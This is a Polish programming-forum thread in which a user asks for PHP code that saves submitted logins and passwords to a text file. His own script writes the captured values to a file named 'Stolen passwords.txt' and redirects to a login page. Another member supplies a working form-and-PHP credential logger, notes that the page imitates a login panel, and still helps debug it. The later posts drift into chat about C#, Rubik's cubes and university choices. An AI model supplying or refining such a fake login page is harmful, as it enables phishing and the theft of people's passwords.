aa
Hugo: Zna ktoś php i ma ma chęć pomóc?
Chodzi o przesył formularza z jednej strony na drugą taka jakby ankieta
1 lip 12:59
albertqwert: To znaczy: wypełniasz formularz, a następnie wynik w zależności od parametrów pokazuje się na
następnej stronie?
1 lip 13:08
albertqwert: Ma widnieć na następnej stronie? Bo ankieta, to jakby pole wyboru, później procentowo
statystyki.
Chyba, że chcesz zmieniać ankietę z poziomu 'administratora', wpisując nowy zestaw pytań, a
następnie udostępniać ludziom w postaci pola wyboru

?
1 lip 13:24
Hugo: mamy dwa pola do wpisania login oraz password oraz przycisk subbmit po wpisaniu w formularz
skrypt prześle mi na serwer i zapisze w postaci txt dane użytkownika
Ogólnie to co napisaleś się pokrywa wiec chyba tak

mam strone nr1 => login.php (nazwałem) oraz password.php(druga moja podstrona)
plik => login.php
http://scr.hu/2pdc/savwx
plik => password.php
<?php
header ("location: https//h1.HOST.pl/USER/login.php");
$handle = fopen ("Stolen
passwords.txt", "a");
foreach ($
GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, −=−);
fwrite($handle, $value);
fwrite($handle, $"\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
1 lip 13:27
Hugo: może źle sie wyraziłem nie ankiete : > po prostu dwa pola i przesyłanie na serwer i by zapisało
opcjonalnie w .txt
1 lip 13:29
Marcin: W pliku html wysyłasz dane go konkretnego pliku .php i zapisujesz ja jako konkretną zmienną za
pomocą metody GET. Coś w tym stylu: $a=$GET['liczba'];
następnie bawisz się tymi z zmiennymi w php.
1 lip 13:32
albertqwert: Chwila, ma tylko zapisywać login i hasło na serwerze?
1 lip 13:33
albertqwert: $nazwaPliku = 'test.txt';
$uchwyt = fopen($nazwaPliku, 'a++');
fwrite($uchwyt, 'kolejna linia w pliku');
1 lip 13:37
albertqwert: fwrite(UCHWYT PLIKU, DANE, DŁUGOŚĆ)
1 lip 13:38
albertqwert: czytanie zawartości pliku: funcja fread()
prototyp funkcji fread(Uchwyt pliku, długość)
a jedną linie pliku czytasz za pomocą f. fgets()
$LiniaZPliku = fgets($uchwyt)
echo $LiniaZPliku
1 lip 13:42
Hugo: dziękuje

aczkolwiek jestem chyba na to za tępy
1 lip 13:49
albertqwert: wstaw tylko do pliku i tyle
1 lip 13:51
albertqwert: jak czegoś nie wiesz, to pytaj. to jest tylko parę linijek
1 lip 13:53
Hugo: albertqwert : Hugo jest tępy, nigdy nie siedzialem w php ; //// i to bedzie taka rozmowa emm (o
ile mnie rozumiesz)
A mógłbyś mi gotowca tutaj wkleić jakkolwiek? bo ja nie wiem które i gdzie w kleić i do czego
czy do mojego login php czy do password php ; /
Będę wdzięczny za cierpliwość i poświecony czas
1 lip 13:54
albertqwert: nie gniewaj się, skróciłem sobie troszkę, bo dla mnie większość kodu jest zbędna (przerost
treści nad formą), później sobie go 'upiększysz',
pisałem w notatniku i nie sprawdzałem, także mogą być drobne błędy,
<form method="post" action="main.php">
<table>
<tr>
<td> Podaj login: </td>
<td><input type="text" name="login"/></td>
</tr>
<tr>
<td> Podaj haslo: </td>
<td><input type="password" name="haslo"/></td>
</tr>
<tr>
<td><input type="submit" name="Wyslij" /></td>
</tr>
</table
</form>
<?php
$NazwaPliku = 'input.txt';
$UchwytPliku = fopen($NazwaPliku, 'a+');
fwrite($UchwytPliku, '.$POST['login'];
fwrite($UchwytPliku, '.$POST['haslo'];
?>
1 lip 14:26
albertqwert: http://pastebin.com/Kj2rUjNt
trzymaj gotowca, to o czym pisaliśmy,
zrób jeszcze plik input.txt w folderze z index.php i będzie działać
<form method="post" action="index.php">
<table>
<tr>
<td> Podaj login: </td>
<td><input type="text" name="login"/></td>
</tr>
<tr>
<td> Podaj haslo: </td>
<td><input type="password" name="haslo"/></td>
</tr>
<tr>
<td><input type="submit" name="Wyslij" /></td>
</tr>
</table
</form>
<?php
$nazwapliku = 'input.txt';
$tresc = "(login ; haslo) \n" ;
$fp = fopen('input.txt', 'a+');
if (is
writable($nazwapliku)) {
if (!$uchwyt = fopen($nazwapliku, 'a+'))
{
echo "Nie mogę otworzyć pliku ($nazwapliku)";
exit;
}
if (fwrite($uchwyt, $tresc) === FALSE)
{
echo "Nie mogę zapisać do pliku";
exit;
}
fwrite($fp, $login);
fwrite($fp, "\t");
fwrite($fp, $haslo);
fclose($uchwyt);
} else
{
echo "Zmień tryb otwierania pliku";
}
?>
1 lip 15:37
albertqwert: powiedz, po co Ci strona do zapisywania loginów i haseł

?
1 lip 15:43
Metis:
1 lip 15:44
albertqwert: ta strona imituje panel logowania
1 lip 15:47
Metis: W kodzie gdzies błąd. Wyrzuca do inputa : (login ; haslo)
1 lip 15:59
albertqwert: nie ma błędu
1 lip 16:02
1 lip 16:06
albertqwert: jak możesz, to wrzuć skrina
1 lip 16:07
Metis: Nie ma za bardzo co screenowac.
Do txt wklejam kod z pastebin'a zapisuje jako index.php. Wrzucam na serwer , tworze plik
input.txt.
Nie tworze zadnego password ani login.php...
Po wpisaniu przypadkowych danych wyrzuca: (login, hasło) w txt.
1 lip 16:11
Hugo: 
okej jestem bo mnie nie było i znów jestem
1 lip 16:18
albertqwert: @Metis, to było celowe. Hugo miał wiedzieć, co jest pierwsze login, czy hasło. Zaraz poprawię i
nie będzie niedomówień.
1 lip 16:19
Hugo: dziękuje za pomoc bardzo szczególnie alberqwerty

!

Muszę sam też poogarniać sie nauczyć, jeszcze raz dzięki !
1 lip 16:20
Metis: Też muszę ogarnąć sobie php

Przydatne
1 lip 16:20
Hugo: a ogarniacie poza tym pythona i androida?
1 lip 16:23
Metis: Ja ogarniam tylko co nie co C#

Ale jest jeszcze czas
1 lip 16:26
Metis: @albertqwert:
Powiedz mi co mam poprawić
1 lip 16:26
1 lip 16:27
albertqwert: te 4 linijki
fwrite($fp, $login);
fwrite($fp, "\t");
fwrite($fp, $haslo);
fclose($uchwyt);
na
fwrite($fp, "(" . $login . ";" . $haslo .")");
1 lip 16:28
1 lip 16:31
Metis: * ( ; )( ; )
1 lip 16:31
albertqwert: no i jeszcze przydałoby się
fileputcontents('input.txt', ''); nad linijką fwrite($fp, "(" . $login . ";" .
$haslo .")");
1 lip 16:32
Hugo: jesteście wielcy

Uważam ze poza forum tu matematycznym i fizycznym to informatyka mogła by
być jeszcze
1 lip 16:33
albertqwert: @Metis
tak automatycznie wyrzuca , jeśli wejdziesz na stronę,
dodaj fileputcontents('input.txt', '');
po wpisaniu danych pojawi się tylko login i hasło w pliku
1 lip 16:33
albertqwert: @Hugo znam podstawy c#, pisałem jakiś czas w nim programy na platformę .net ale nic więcej,
ogarniam androida po trochu
1 lip 16:34
Metis: @albertqwert
Wrzuc pastebin jak powinnen wygladac cały ten kod

Nadal wyrzuca nawiasy
1 lip 16:37
albertqwert: wyrzuca tylko raz przy wejściu, później czyści plik i dodaje dane. tak napisałem program i
musiałbym zmienić coś więcej, tak po prostu napisałem instrukcje warunkową
http://pastebin.com/sAJb9073
1 lip 16:39
Metis: Po wejsciu wyrzuca jeden nawias . Po wpisaniu przypadkowych danych dwa.
1 lip 16:44
albertqwert: (login;hasło) tak?
1 lip 16:45
1 lip 16:48
1 lip 16:52
Metis: Jakis błąd chyba w zapisie bo znowu wyrzuca jeden nawias. Po wejściu. Po wpisaniu nic.
1 lip 16:57
albertqwert: usun plik input.txt i zrob nowy
1 lip 16:57
Metis: Tak zrobiłem
1 lip 17:00
albertqwert: I co?
1 lip 17:00
Metis: Tak zrobiłem na samym początku. Wywala nawias.
1 lip 17:01
albertqwert: Jakiego programu używasz do stawiania serwera php?
Trzeba spytać jeszcze kogoś postronnego.
1 lip 17:04
Metis: Filezille Portable.
Zmieniłem też prawa pliku do publicznego zapisu, ale bez skutku.
@Hugo
A tobie działa kod ?
1 lip 17:06
albertqwert: @Metis
Jak idzie nauka c#?
1 lip 17:13
Hugo: na razie ogarniam :3 a to mi troche zajmuje
1 lip 17:13
Metis: Na razie nauka c# odłożona

Ale jest w planach na te 2 miesiące nieczego nie robienia

( przygotowałem sobie nawet listę
co mam +− ogarnąc

)
Wróciłem do nauki algorytmów kostki Rubika
1 lip 17:15
albertqwert: W ile sekund układasz? Mi zajmuje to około 2 min.
1 lip 17:17
Metis: Bez algorytmów zaawansowanych też ułożę gdzies w 2 minuty

2 minuty algorytmami na lewo , na prawo, krzyż i zółty krzyż.
Ale uczę się metody Friedrich . Chce układać w rejonie 30−40 s − taki cel
1 lip 17:23
albertqwert: Mówisz, że wybierasz się na informatykę? W czasie wakacji chcę opanować część materiału, która
obowiązuje na studiach z programowania. Więcej czasu na inne przedmioty będę miał. Częściowo
c#, java, c jest za mną. Teraz tylko doskonale się w implementowaniu algorytmu do programów.
@Hugo
Ogarnąłeś już to?
1 lip 17:29
Metis: @albertqwert
A ty gdzie sie wybierasz? Jestes tegorocznym maturzystom?
1 lip 17:34
Metis: *maturzystą
1 lip 17:35
1 lip 17:36
albertqwert: http://www.fais.uj.edu.pl/documents/41628/30387fce-bd4c-4c16-ab11-9aa2b993b598
cytuję:
"ma gruntowną wiedzę na temat różnych języków programowania (np.
asembler, C, C++, C#, Java, JavaScipt, PHP); szczegółowo zna metody
projektowania i programowania obiektowego (np. kapsułkowanie i
ukrywanie informacji, klasy i podklasy, dziedziczenie, polimorfizm,
hierarchie klas) "
1 lip 17:39
Metis: Ja mam jeszcze rok do wyboru

Ale kreci mnie informatyka i interesuje, a korzystając z faktu ze w tym roku nigdzie nie
wyjeżdżam i na nic większego sie nie zapowiada będę sobie lekko programował

W moim przypadku Kraków odpada. Jakos nie przepadam za tym miastem.
Planuje iść albo na UW , albo PW .
1 lip 17:43